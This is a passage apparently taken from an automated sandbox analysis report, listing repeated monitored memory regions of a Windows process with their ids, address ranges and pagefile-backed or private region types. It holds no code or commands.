0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8395 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8396 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8397 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8398 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8399 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8400 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8401 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8402 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8403 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8404 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8405 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8406 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8407 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8408 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8409 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8410 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8411 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8412 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8413 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8414 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8415 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8416 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8417 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8418 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8419 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8420 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8421 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8422 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8423 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8424 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8425 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8426 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8427 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8428 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8429 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8430 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8431 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8432 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8433 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8434 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8435 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8436 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8437 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8438 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8439 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8440 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8441 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8442 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8443 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8444 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8445 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8446 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8447 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8448 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8449 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8450 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8451 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8452 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8453 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8454 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8455 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8456 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8457 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8458 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8459 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8460 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8461 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8462 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8463 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8464 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8465 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8466 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8467 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8468 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8469 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8470 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8471 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8472 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8473 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8474 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8475 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8476 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8477 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8478 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8479 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8480 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8481 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8482 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8483 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8484 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8485 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8486 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8487 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8488 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8489 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8490 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8491 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8492 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8493 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8494 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8495 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8496 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8497 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8498 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8499 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8500 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8501 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8502 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8503 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8504 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8505 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8506 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8507 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8508 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8509 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8510 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8511 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8512 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8513 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8514 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8515 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8516 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8517 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8518 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8519 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8520 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8521 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8522 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8523 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8524 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8525 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8526 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8527 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8528 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8529 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8530 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8531 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8532 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8533 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8534 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8535 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8536 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8537 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8538 start_va = 0x44f0000 end_va = 0x4507fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8542 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8543 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8544 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8545 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8546 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8547 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8548 start_va = 0x44f0000 end_va = 0x4501fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8549 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8550 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8551 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8552 start_va = 0x44f0000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 8553 start_va = 0x44f0000 end_va = 0x450bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 8554 start_va = 0x4510000 end_va = 0x451dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004510000" filename = "" Region: id = 8555 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8556 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8557 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8558 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8559 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8560 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8561 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8562 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8563 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8564 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8565 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8566 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8567 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8568 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8569 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8570 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8571 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8572 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8573 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8574 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8575 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = 